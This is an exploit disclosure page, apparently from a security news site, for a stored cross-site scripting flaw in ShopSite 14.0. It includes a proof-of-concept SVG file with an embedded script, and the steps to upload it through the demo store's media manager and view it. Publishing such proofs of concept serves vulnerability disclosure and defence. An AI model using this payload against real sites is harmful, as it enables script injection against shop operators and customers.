Home Tools Exploits & CVE's ShopSite 14.0 Cross Site Scripting

ShopSite 14.0 Cross Site Scripting

January 2, 2024

167

Authored by tmrswrr

ShopSite version 14.0 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: ShopSite Version: 14.0 - Stored XSS
# Date: 2023-12-25
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://www.shopsite.com/
# Version: 14.0
# Tested on: https://www.shopsite.com/demo.html



1 ) Upload poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgi

poc.svg

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
    <script>//<![CDATA[
        alert(document.domain)
    //]]>
    </script>
</svg>


2 ) Check here will be see alert button : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg

ShopSite 14.0 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Doctor Appointment Management System 1.0 Cross Site Scripting

Kemp LoadMaster Unauthenticated Command Injection

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

SAP Fiori Launchpad Cross Site Scripting

VMWare Aria Operations For Networks Remote Code Execution

Xerte 3.10.3 Directory Traversal